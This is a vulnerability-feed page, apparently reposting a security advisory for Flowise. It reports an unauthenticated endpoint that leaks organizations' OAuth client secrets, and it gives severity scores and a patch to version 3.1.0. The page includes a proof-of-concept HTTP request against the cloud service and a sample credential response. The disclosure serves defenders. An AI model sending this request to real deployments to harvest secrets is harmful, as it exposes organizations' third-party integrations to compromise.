AI Threat Alert AI Threat Alert

GHSA-6pcv-j4jx-m4vx

GHSA-6pcv-j4jx-m4vx MEDIUM
Published April 16, 2026

### Summary I have discovered a critical Missing Authentication vulnerability on the /api/v1/loginmethod endpoint. The API allows unauthenticated users (guests) to retrieve the full SSO configuration of any organization by simply providing an organizationId. The response includes sensitive OAuth...

Full CISO analysis pending enrichment.

Affected Systems

Package Ecosystem Vulnerable Range Patched
flowise npm <= 3.0.13 3.1.0

Do you use flowise? You're affected.

Severity & Risk

CVSS 3.1
5.3 / 10
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
N/A

Attack Surface

AV AC PR UI S C I A
AV Network
AC Low
PR None
UI None
S Unchanged
C Low
I None
A None

Recommended Action

Patch available

Update flowise to version 3.1.0

Compliance Impact

Compliance analysis pending. Sign in for full compliance mapping when available.

Frequently Asked Questions

What is GHSA-6pcv-j4jx-m4vx?

Flowise: Unauthenticated Information Disclosure of OAuth Secrets (Cleartext) via GET Request

Is GHSA-6pcv-j4jx-m4vx actively exploited?

No confirmed active exploitation of GHSA-6pcv-j4jx-m4vx has been reported, but organizations should still patch proactively.

How to fix GHSA-6pcv-j4jx-m4vx?

Update to patched version: flowise 3.1.0.

What is the CVSS score for GHSA-6pcv-j4jx-m4vx?

GHSA-6pcv-j4jx-m4vx has a CVSS v3.1 base score of 5.3 (MEDIUM).

Technical Details

NVD Description

### Summary I have discovered a critical Missing Authentication vulnerability on the /api/v1/loginmethod endpoint. The API allows unauthenticated users (guests) to retrieve the full SSO configuration of any organization by simply providing an organizationId. The response includes sensitive OAuth credentials (Client Secrets) in cleartext. ### PoC The following request can be sent by anyone on the internet without any cookies or authorization headers. Request ```http GET /api/v1/loginmethod?organizationId=<any_organization_id> HTTP/2 Host: cloud.flowiseai.com Accept: application/json Content-Type: application/json ``` Response: The server returns 200 OK with sensitive credentials: ```json { "providers": [ { "id": "a04ba769-b810-481d-8d6b-84f8c377dea5", "organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d", "name": "azure", "config": { "tenantID": "", "clientID": "", "clientSecret": "" }, "status": "disable", "createdDate": "2025-12-26T18:52:33.453Z", "updatedDate": "2025-12-26T19:31:56.087Z", "createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2", "updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2" }, { "id": "eda8bd90-1c45-4aca-933f-3a53d9be4161", "organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d", "name": "google", "config": { "clientID": "123455", "clientSecret": "123455" }, "status": "enable", "createdDate": "2025-12-26T18:52:33.453Z", "updatedDate": "2025-12-26T19:31:56.087Z", "createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2", "updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2" }, { "id": "0d238df0-c89c-4733-bf57-6ec06f58c7e7", "organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d", "name": "auth0", "config": { "domain": "", "clientID": "", "clientSecret": "" }, "status": "disable", "createdDate": "2025-12-26T18:52:33.453Z", "updatedDate": "2025-12-26T19:31:56.087Z", "createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2", "updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2" }, { "id": "e060ae88-c7f4-4b7c-9bdc-5321963a1648", "organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d", "name": "github", "config": { "clientID": "", "clientSecret": "" }, "status": "disable", "createdDate": "2025-12-26T18:52:33.453Z", "updatedDate": "2025-12-26T19:31:56.087Z", "createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2", "updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2" } ], "callbacks": [ { "providerName": "azure", "callbackURL": "https://cloud.flowiseai.com/api/v1/azure/callback" }, { "providerName": "google", "callbackURL": "https://cloud.flowiseai.com/api/v1/google/callback" }, { "providerName": "auth0", "callbackURL": "https://cloud.flowiseai.com/api/v1/auth0/callback" }, { "providerName": "github", "callbackURL": "https://cloud.flowiseai.com/api/v1/github/callback" } ] } ``` ### Affected Deployments - FlowiseAI Cloud (cloud.flowiseai.com) - Self-hosted FlowiseAI instances where the /api/v1/loginmethod endpoint is exposed ### Impact An unauthenticated attacker can harvest sensitive API secrets (Google, Microsoft, GitHub Client Secrets) from any organization on the cloud platform. This leads to complete compromise of the organization's third-party integrations and potential data breaches.

Weaknesses (CWE)

CWE-306 Missing Authentication for Critical Function Primary CWE-312 Cleartext Storage of Sensitive Information Primary

CVSS Vector

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

References

Timeline

Published
April 16, 2026
Last Modified
April 16, 2026
First Seen
April 17, 2026

Related Vulnerabilities

CRITICAL CVE-2026-40933 10.0

Analysis pending

Same package: flowise
CRITICAL CVE-2025-59528 10.0

Flowise: Unauthenticated RCE via MCP config injection

Same package: flowise
CRITICAL CVE-2025-61913 9.9

Flowise: path traversal in file tools leads to RCE

Same package: flowise
CRITICAL CVE-2026-30824 9.8

Flowise: auth bypass exposes NVIDIA NIM container endpoints

Same package: flowise
CRITICAL CVE-2026-30821 9.8

flowise: Arbitrary File Upload enables RCE

Same package: flowise
Back to Threat Feed